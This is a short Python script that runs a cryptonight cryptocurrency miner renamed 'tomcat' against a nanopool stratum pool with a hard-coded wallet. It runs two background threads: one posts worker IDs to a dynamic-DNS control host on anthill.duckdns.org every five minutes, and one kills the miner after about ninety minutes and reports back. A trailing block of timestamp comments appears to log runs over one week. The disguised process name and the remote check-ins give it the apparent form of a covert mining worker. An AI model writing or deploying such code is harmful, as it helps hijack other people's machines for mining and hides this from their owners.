import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:19:04.414870
#2018-02-17 16:06:07.486539
#2018-02-17 17:55:06.021143
#2018-02-17 19:43:03.396396
#2018-02-17 21:30:04.243361
#2018-02-17 23:14:07.376710
#2018-02-18 01:01:04.770398
#2018-02-18 02:48:07.451350
#2018-02-18 04:35:04.123107
#2018-02-18 06:26:07.101657
#2018-02-18 08:16:04.656204
#2018-02-18 10:04:06.197944
#2018-02-18 11:50:08.074328
#2018-02-18 13:35:04.125975
#2018-02-18 15:25:08.712890
#2018-02-18 17:15:07.914172
#2018-02-18 19:03:06.407394
#2018-02-18 20:50:08.039134
#2018-02-18 22:36:07.300208
#2018-02-19 00:24:01.318639
#2018-02-19 02:10:09.248642
#2018-02-19 03:57:01.320553
#2018-02-19 05:41:07.057073
#2018-02-19 07:30:08.796670
#2018-02-19 09:20:06.331874
#2018-02-19 11:09:03.869420
#2018-02-19 12:56:01.633805
#2018-02-19 14:44:10.191436
#2018-02-19 16:32:08.211691
#2018-02-19 18:19:05.297780
#2018-02-19 20:05:06.170388
#2018-02-19 21:56:04.373236
#2018-02-19 23:41:07.824965
#2018-02-20 01:28:06.337025
#2018-02-20 03:17:06.797809
#2018-02-20 05:05:08.451083
#2018-02-20 06:48:05.239593
#2018-02-20 08:34:08.097371
#2018-02-20 10:18:02.315818
#2018-02-20 12:03:08.376031
#2018-02-20 13:51:07.856757
#2018-02-20 15:27:08.907226
#2018-02-20 17:13:05.688910
#2018-02-20 19:03:10.833697
#2018-02-20 20:53:04.648699
#2018-02-20 22:37:07.629389
#2018-02-21 00:19:02.253148
#2018-02-21 02:05:08.083479
#2018-02-21 03:52:05.795225
#2018-02-21 05:39:06.266789
#2018-02-21 07:27:07.325281
#2018-02-21 09:12:07.167727
#2018-02-21 11:01:01.813771
#2018-02-21 12:48:01.366167
#2018-02-21 15:06:11.198347
#2018-02-21 16:56:04.495690
#2018-02-21 18:44:01.635760
#2018-02-21 20:32:06.074932
#2018-02-21 22:18:05.921215
#2018-02-22 00:07:07.105726
#2018-02-22 01:54:06.666585
#2018-02-22 03:41:07.488735
#2018-02-22 05:28:06.637251
#2018-02-22 07:13:06.714554
#2018-02-22 09:01:05.764914
#2018-02-22 10:48:05.147018
#2018-02-22 12:34:01.261735
#2018-02-22 14:19:07.741766
#2018-02-22 16:06:15.804895
#2018-02-22 17:53:06.476876
#2018-02-22 19:41:05.239447
#2018-02-22 21:33:06.407987
#2018-02-22 23:21:06.814994
#2018-02-23 01:07:08.383470
#2018-02-23 02:54:06.230186
#2018-02-23 04:42:01.271838
#2018-02-23 06:27:01.588758
#2018-02-23 08:15:04.159291
#2018-02-23 10:33:08.694645
#2018-02-23 12:24:09.712761
#2018-02-23 14:13:02.288629
#2018-02-23 16:05:12.222590
#2018-02-23 17:51:05.990462
#2018-02-23 19:37:01.245047
#2018-02-23 21:20:06.859527
#2018-02-23 23:07:07.818471
#2018-02-24 00:54:01.832158
#2018-02-24 02:41:04.463850
#2018-02-24 04:36:01.289989
#2018-02-24 06:20:01.407915
#2018-02-24 08:08:06.020624
#2018-02-24 09:53:04.677619
#2018-02-24 11:48:03.951555
#2018-02-24 13:39:05.257355
#2018-02-24 15:26:02.213850
#2018-02-24 17:15:08.831781
#2018-02-24 19:07:04.895538
#2018-02-24 20:56:04.759731
#2018-02-24 23:22:04.686566
#2018-02-25 02:47:03.812549
#2018-02-25 05:31:02.002017
#2018-02-25 08:10:06.816378
#2018-02-25 11:41:03.090842
#2018-02-25 14:10:01.683634
#2018-02-25 15:45:03.965887